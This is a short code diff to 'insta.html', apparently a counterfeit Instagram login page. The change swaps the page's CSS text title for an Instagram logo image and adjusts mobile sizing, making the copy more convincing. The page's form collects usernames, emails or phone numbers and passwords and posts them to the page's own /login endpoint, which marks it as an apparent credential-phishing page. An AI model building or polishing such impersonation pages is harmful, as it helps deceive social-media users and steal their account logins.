--- a/insta.html
+++ b/insta.html
@@ -33,15 +33,6 @@
       text-align: center;
       padding: 22px;
     }
-    .instagram-text {
-      font-family: 'Pacifico', cursive;
-      font-size: 50px;
-      color: black;
-      margin-bottom: 20px;
-      letter-spacing: 0.6px;
-      font-weight: 400;
-      text-shadow: 0 0 0.3px rgba(0,0,0,0.3);
-    }
     form { display: flex; flex-direction: column; gap: 8px; }
     input[type="text"], input[type="password"] {
       padding: 9px 10px;
@@ -90,13 +81,15 @@
       margin-top: 14px;
       line-height: 1.4;
     }
-    @media (max-width: 500px) { .card { width: 92vw; } }
+    @media (max-width: 500px) { .card { width: 92vw; } img { width: 120px; } }
   </style>
 </head>
 <body>
   <div class="wrap">
     <div class="card" role="region" aria-label="Login">
-      <div class="instagram-text">Instagram</div>
+      <!-- Title replaced with image -->
+      <img src="hhh.jpg" alt="Instagram" style="width: 150px; margin-bottom: 20px;">
+
       <form id="loginForm" autocomplete="on" action="/login" method="post">
         <input type="text" id="username" name="username" placeholder="Phone number, username or email" required>
         <input type="password" id="password" name="password" placeholder="Password" required>
